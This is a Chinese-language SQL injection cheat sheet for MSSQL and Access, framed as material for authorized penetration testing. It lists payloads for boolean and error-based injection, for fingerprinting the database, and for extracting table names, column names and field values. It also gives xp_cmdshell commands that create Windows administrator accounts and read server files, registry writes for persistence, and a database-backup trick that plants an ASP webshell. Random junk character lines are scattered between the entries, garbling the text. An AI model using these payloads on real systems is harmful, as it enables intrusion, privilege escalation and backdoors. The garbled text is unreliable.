1.判断是否有注入：分别提交 ;and 1=1 与 ;and 1=2，对比页面返回是否不同（布尔盲注判定）。本文各条中的 ;and / ;exec 前缀均假设注入点为数字型参数；以下内容仅适用于授权范围内的渗透测试。
2.初步判断是否是mssql：;and user>0 。mssql 中 user 为 nvarchar 类型，与整数比较会触发类型转换错误，并在错误信息中泄露当前连接用户名；access 没有 user 函数，报错内容不同。
)xb|3&+W
3.注入参数是字符型时：'and [查询条件] and ''=' （结尾的 ''=' 用于闭合原 SQL 中剩余的单引号）
a_h]?5
:c
4.搜索（LIKE）且未过滤参数时：'and [查询条件] and '%25'=' （%25 为 URL 编码后的 %，用于闭合 LIKE '%...%' 模式）
Y?ez9o:/#
5.判断数据库系统（依据各自系统表是否存在）
Cgz D$`~
;and (select count(*) from sysobjects)>0 返回正常页面则为 mssql（sysobjects 为 mssql 系统表）
CRbdAqofV
;and (select count(*) from msysobjects)>0 返回正常页面则为 access（msysobjects 为 access 系统表；默认通常无读取权限，此时表现为权限错误而非语法错误，同样可据此区分）
gKOOHUCb
&Q}*+Y]G
lo'W1p
6.猜表名 ;and (select Count(*) from [表名])>0 （原文的"数据库名"实际指表名；方括号可避免与保留字冲突）
*6 _tQ9G
7.猜字段名 ;and (select Count(字段名) from 表名)>0 （字段不存在时返回错误页）
tDr#H!2
3
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 表名)>0 （将 >0 改为 >N 逐步二分即可确定长度）
p$ bnK]
9.(1)猜字段值的 ascii 码(access)
5s{ABJ\@V
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0 （mid 的第 2 个参数为字符位置，逐位递增；>0 同样改为 >N 二分）
!?^b[
nC%
(2)猜字段值的 ascii 码(mssql)
au,t%8AC
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0 （unicode() 返回 nvarchar 的 UTF-16 码位，非 ASCII 字符结果会大于 255）
@y31NH(
10.测试权限结构(mssql)：IS_SRVROLEMEMBER / IS_MEMBER 返回 1 表示当前登录是该角色成员，0 表示不是，NULL 表示角色不存在或不可见
QMEcQV>
J<Pw+6B~
z"*/mP2
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 固定服务器角色 sysadmin，为 1 则后文的 xp_cmdshell、注册表、backup 等操作均可执行
h[Gg}N!
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
N25V]
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
m[k_>e\u
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 可创建登录名，第 11 条的 sp_addlogin 至少需要此角色
U\rh[0
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
1,5E`J
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
JF/,K"J
;and 1=(select IS_MEMBER('db_owner'));-- 数据库角色，仅针对当前连接的数据库
J~(Wf%jM~
H~ u[3LQz
mw5?[@G-
11.添加mssql和系统的帐户（需 sysadmin 或 securityadmin；sp_addlogin、sp_password、sp_addsrvrolemember 均为已弃用存储过程，新版本应改用 CREATE LOGIN / ALTER LOGIN / ALTER SERVER ROLE ... ADD MEMBER）
/pp1~r.s?>
;exec master.dbo.sp_addlogin username;-- 创建登录名（未指定密码时密码为空）
;exec master.dbo.sp_password null,password,username;-- 参数顺序为 旧密码, 新密码, 登录名；原文 null,username,password 把后两个参数写反了
U.{l;EL:T
;exec master.dbo.sp_addsrvrolemember username,sysadmin;-- 参数顺序为 登录名, 角色名（原文顺序写反）
4`Ic&c/
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- 整条为一行命令。xp_cmdshell 自 SQL Server 2005 起默认禁用，需先以 sysadmin 执行 ;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;-- 。命令以 SQL Server 服务账户身份执行，服务账户权限不足时 net user 会失败
0kDK~iT
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 上一条的简化形式
DQwGUF'(
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 加入本机 administrators 组
L,;D@Xi
H:H6b
-)vEWn$3<
12.(1)遍历目录（需在当前库有 create table / insert 权限；xp_dirtree 默认返回 subdirectory、depth 两列，与 dirs(paths, id) 两列一一对应）
|j3'eW&=
;create table dirs(paths varchar(100), id int)
qto|X@
,7XtH>2s
;insert dirs exec master.dbo.xp_dirtree 'c:\'
(Z5##dS3
;and (select top 1 paths from dirs)>0 varchar 与整数比较触发转换错误，目录名随错误信息回显（报错注入，需要页面显示数据库错误）
#.[AK_S5&
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0 （原文末尾的 >) 为笔误，应为 >0；每次把已得到的目录名追加进 not in 列表即可逐个取出）
~XeFOMq
<}6{{&mT4
RllY-JBO
(2)遍历目录（temp 表建 4 列是为了接收 xp_availablemedia 的 4 列输出；其余过程按 insert 指定的列接收）
7*DMVok:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
PCn Q_A-Q
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表（只返回一层）
d3^OEwe
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构（两列：子目录名、深度）
/J)l /oI
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容（xp_cmdshell 输出的每一行成为 temp 的一行，需已启用 xp_cmdshell）
VDB;%U*D
^w~23g.
BK,sc'b
13.mssql中的存储过程（注册表相关的扩展存储过程；均需高权限，xp_regwrite 写入 Run 键即可实现开机持久化，对目标系统有实际改动，测试时务必清理）
r3rxC&
xp_regenumvalues 注册表根键, 子键
x{}z ;yG
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回该键下所有值（此处即枚举开机自启动项）
>MJ?g-
xp_regread 根键,子键,键值名
G1 o70
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键值的数据（整条为一行）
)x#5Il
H
xp_regwrite 根键,子键, 值名, 值类型, 值
m
a'\By?V]
值类型常用 2 种：REG_SZ 表示字符串，REG_DWORD 表示整型
#sKWd
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表（写入的是测试值，测试后应按下文删除）
"x'),
xp_regdeletevalue 根键,子键,值名
S~$'WA
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值（清理上一步写入的 TestValueName）
PZ8U6K'
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键，包括该键下所有值（不可恢复，切勿对非测试键使用）
k&hc m
\F, DA"K_
!\[+99F#
14.mssql的backup创建webshell（需 BACKUP DATABASE 权限，且 SQL Server 服务账户对目标路径有写权限；model 是系统模板库，对它的改动会复制到之后新建的每个数据库，测试后应删除 cmd 表）
~fz[x 9\
use model
U3vEdw<lV
create table cmd(str image);
(B>Zaro#
insert into cmd(str) values (''); -- 此处应填入 asp 脚本内容，原文留空只会得到一个不含脚本的文件
36H
o?Sla_D
backup database model to disk='c:\l.asp'; -- 备份文件包含二进制头尾，脚本片段夹在其中；一般 asp 解析器仍会执行 <% %> 内的代码，但页面会夹带大量乱码
D 7shiv|,
/7$mxtB5%L
V9x8R
15.mssql内置函数（以下 >0 比较均依靠字符串转整数的报错回显，需要页面显示数据库错误信息）
|c-LSs'\
;and (select @@version)>0 获得 SQL Server 版本及其所在 Windows 版本（@@version 的内容并非单纯的 Windows 版本号）
IN^9uL]B
;and user_name()='dbo' 判断当前连接用户是否映射为 dbo（sysadmin 成员以及数据库所有者都映射为 dbo，不一定就是 sa）
yeD_j/
_J?SIm
;and (select user_name())>0 爆当前连接的数据库用户名
yt.c5>B^
;and (select db_name())>0 得到当前连接的数据库名
X=qS"O 1
^[h2% c$
VlW9UF-W
16.简洁的webshell（与第 14 条步骤相同，只是备份路径指向 web 目录；前提与注意事项同第 14 条）
Z$K+
7>^
use model
!"4w&bQ
create table cmd(str image);
GCE!$W
insert into cmd(str) values (''); -- 同第 14 条，此处应填入 asp 脚本内容
_^uc 0=
backup database model to disk='g:\wwwtest\l.asp';